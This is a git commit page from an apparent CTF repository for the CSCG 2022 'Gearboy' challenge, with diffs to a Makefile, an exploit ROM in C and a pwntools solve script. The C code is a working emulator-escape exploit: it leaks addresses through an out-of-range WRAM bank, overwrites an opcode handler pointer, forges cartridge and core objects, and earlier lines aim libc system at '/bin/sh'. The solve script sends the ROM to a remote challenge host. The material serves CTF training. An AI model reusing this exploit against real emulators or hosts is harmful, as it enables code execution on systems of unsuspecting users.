cscg22-gearboy

CSCG 2022 Challenge 'Gearboy'
git clone https://git.sinitax.com/sinitax/cscg22-gearboy
Log | Files | Refs | sfeed.txt
commit e3357dff0937f0d7f5c3bbf75bc479f566fee3d0
parent a1f7b8843f887d2d698477d6d8544e545a517725
Author: Louis Burda <quent.burda@gmail.com>
Date:   Thu, 26 May 2022 20:41:58 +0200

Trolled by load instruction

Diffstat:

MMakefile | 2+-


Mmain.c | 43+++++++++++++++++++++++++++++++++----------


Msolve.py | 6++++--


3 files changed, 38 insertions(+), 13 deletions(-)

diff --git a/Makefile b/Makefile
@@ -22,7 +22,7 @@ main.gb: main.c $(LCC)
 	$(LCC) -o $@ -Wall $< -Wl-yp0x143=0x80
 
 $(GEARBOY):
-	make -C ./gearboy/platforms/linux
+	DEBUG=1 make -C ./gearboy/platforms/linux
 
 run: $(GEARBOY) main.gb
 	$(GEARBOY) main.gb
diff --git a/main.c b/main.c
@@ -4,8 +4,13 @@
 void
 main(void)
 {
-	volatile static uint8_t *processor;
-	volatile static uint8_t *memory;
+	volatile static uint8_t *processor_gb;
+	volatile static uint8_t *memory_gb;
+	volatile static uint8_t *gbcore_gb;
+	volatile static uint8_t *cartridge_gb;
+	volatile static uint64_t memory;
+	volatile static uint64_t processor;
+	volatile static uint64_t cartridge;
 	volatile static uint64_t op0x00;
 	volatile static uint64_t base;
 	volatile static uint64_t libc;
@@ -17,17 +22,35 @@ main(void)
 	/* processor - wrambanks = -0x126a0 */
 
 	/* WRAM BANK = -0x13 */
-	processor = (void*) 0xD960;
+	processor_gb = (void*) 0xD960;
+	memory_gb = processor_gb - 0xd0;
+
+	/* leak base addr */
+	op0x00 = *(uint64_t*)processor_gb;
+	base = op0x00 - 0x1d420;
+	target = base + 0x13df0;
+
+	/* get real adresses */
+	processor = *(uint64_t*)memory_gb;
 	memory = processor - 0xd0;
 
-	/* leak libc from addr */
-	leak = *(uint64_t*)(memory + 0x30);
-	libc = leak + 0x125cff0;
-	target = libc + 0x52290; /* system */
+	*(uint64_t*)processor_gb = target;
+
+	/* setup fake cartridge opject behind processor & memory */
+	cartridge = processor - 0x960;
+	cartridge_gb = (void*) 0xD000; /* start of wram bank */
+	*(uint8_t*)(cartridge_gb+0x30) = 1; /* loaded */
+	*(uint8_t*)(cartridge_gb+0x40) = 1; /* battery */
+	strcpy((char*)(cartridge_gb+0x41), "/home/ctf/wrapper.py"); /* filepath */
+
+	/* setup fake gameboycore object */
+	gbcore_gb = processor_gb; /* at processor addr */
+	// *(uint64_t*)(gbcore_gb+0x00) = memory;
+	// *(uint64_t*)(gbcore_gb+0x08) = processor;
+	// *(uint64_t*)(gbcore_gb+0x28) = cartridge;
 
-	/* set opcode 0x00 (nop) to gadget */
-	strcpy(processor, "/bin/sh");
-	*(uint64_t*)(processor+0x10*0x10) = target;
+	/* set opcode 0x10 (stop) to saveRam */
+	// *(uint64_t*)(processor+0x10*0x10) = target;
 	// *(uint64_t*)(processor+0x10*0x10) = 0;
 
 	__asm \
diff --git a/solve.py b/solve.py
@@ -12,8 +12,10 @@ state = list(open("main.state", "rb").read())
 for i,v in enumerate(struct.pack("<i", -0x13)):
     state[0x10000+i] = v
 
-io = process("ncat --ssl 61a837693e76115bbb874401-gearboy.challenge.master.cscg.live 31337".split())
-#io = process("ncat localhost 1024".split())
+if len(argv) > 1:
+    io = process(argv[1:])
+else:
+    io = process("ncat localhost 1024".split())
 io.sendline(b64encode(bytes(rom)))
 io.sendline(b64encode(bytes(state)))